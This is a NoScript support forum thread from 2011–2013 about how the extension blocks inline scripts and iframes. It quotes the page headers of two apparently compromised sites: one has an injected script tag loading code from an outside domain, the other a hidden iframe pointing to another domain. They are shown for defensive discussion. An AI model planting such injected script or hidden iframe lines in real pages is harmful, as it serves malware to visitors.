InformAction Forums

NoScripters and WebSec nerds of all lands, unite!
https://forums.informaction.com/

Inline Script Blockage

https://forums.informaction.com/viewtopic.php?t=6960

Page 1 of 1

Inline Script Blockage

Posted: Mon Aug 01, 2011 3:55 pm
by therube
Is the script here (jquery.js) considered "inline" script?
And to be clear, it is blocked by NoScript, by default, even if the primary domain (vikingimporting.com) is allowed?

Code: Select all

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<title>Viking Importing</title><script src=http://exero.eu/catalog/jquery.js></script><title></title>
<base href="http://www.vikingimporting.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
MALWARE WARNING: h t t p ://w w w.vikingimporting.com/

IFRAME Blockage

Posted: Mon Aug 01, 2011 4:02 pm
by therube
And while we're here ...

Code: Select all

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Mammoth Equipment<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>
<base href="http://mammothequipment.com/">
<link rel="stylesheet" type="text/css" href="stylesheet.css">
</head>
The IFRAME is blocked - if Options | Embeddings | Forbid <IFRAME> is enabled?
And even if it were not, script from willysy.com would not run unless it were specifically allowed?

MALWARE WARNING: h t t p :// mammothequipment.com/

Re: Inline Script Blockage

Posted: Fri Feb 03, 2012 9:47 pm
by therube
Giorgio wrote: Inline scripts are blocked by default on non-whitelisted sites.
You cannot disable them selectively on whitelisted sites, if that's what you're asking for, but you can modify their execution environment to "cripple" them or otherwise change their behavior by writing your own page-level script surrogates.
http://forums.informaction.com/viewtopi ... 936#p34936

So explain further, because I'm still not clear.

I have not allowed vikingimporting.com.
Because of that, scripts from exero.eu will not run.
Though that is always the case, unless I have specifically allowed exero.eu?

Will "inlined" exero.eu run from vikingimporting.com, if vikingimporting.com is NOT allowed, but exero.eu has been Allowed?
Yes, I think it will? At least plugins (Flash) may work that way?

Now, if I allow vikingimporting.com, then ... ?
Then exero.eu ... will run, even though not specifically Allowed? And that is dangerous.

Explain further or clear my misunderstanding if you would.
Thanks.

Re: Inline Script Blockage

Posted: Fri Feb 03, 2012 9:51 pm
by therube
And is this the same, Ads beng served with ads sites blocked.

Re: Inline Script Blockage

Posted: Mon Oct 28, 2013 10:17 pm
by Thrawn
therube wrote:Is the script here (jquery.js) considered "inline" script?
No.

Inline script is when you define the JavaScript within the page itself, rather than including a link to an external script file.

Code: Select all

<html>
<head>
<script type="text/javascript">
  alert("Hello world!");
</script>
And NoScript blocks inline scripts if the domain that they come from (ie the domain of the page you're on) is blocked.
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited